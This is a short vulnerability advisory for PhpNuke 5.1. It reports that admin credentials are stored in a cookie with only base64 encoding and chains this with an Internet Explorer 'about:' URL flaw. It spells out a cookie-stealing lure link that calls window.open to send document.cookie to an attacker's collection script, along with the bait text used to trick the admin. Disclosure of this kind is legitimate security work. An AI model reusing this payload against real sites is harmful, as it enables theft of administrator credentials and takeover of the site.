PhpNuke Admin password can be stolen ! by Cabezon Aurélien | aurelien.cabezon@iSecureLabs.com http://www.isecurelabs.com/article.php?sid=229 [FR VERSION] + screen shot Vulnerable : PhpNuke 5.1 Other version : not tested PostNuke : not tested [1] Introduction I have found a way to stole PhpNuke Admin password. I use 2 vulnerability. [2] Description The first vulnerability is that ADMIN login/passwd are stored in a cookie like this : ---snip--- lang english isecurelabs.com/ 0 725504896 29523774 551579360 29450340 * admin QWRtaW46TmljZV9Ucnk6DQo= isecurelabs.com/ 0 1451582336 29456384 3432929360 29450340 * ---snip--- and i discovered that the Admin password was BASE64 encoded ! So it is very easy to decode it ! Fore exemple : QWRtaW46TmljZV9Ucnk6DQo= is Admin:Nice_Try: You can verify here : http://www.isecurelabs.com/base64.php The second vulnerability i use is the "Microsoft IE Cookies Exposure via 'About:' URLS" exposed here : http://www.securiteam.com/windowsntfocus/6I00D1535I.html Here is the plan : First create a php script that can gather getenv("QUERY_STRING") in a file. Then create this kind of link and force the phpnuke administrator to follow it : [a href="about://www.nuked-site.com/[script]window.open("http://www.yourwebsite .com/cook.php?"+document.cookie);[/script]"]Hey,this is the last Bind9 remote root exploit ![/a] (replace [ & ] by < & >) www.nuked-site.com is the site that you want to get cookie. www.yourwebsute.com is the site that will recieve the cookie thru the cook.php script. If the nuked site's admin follow this link, he will send to your script his cookie with the Base64 encoded password. Then you just have to decode it ! That's all ! regards, --- Cabezon Aurélien | aurelien.cabezon@isecurelabs.com http://www.iSecureLabs.com | French Security Portal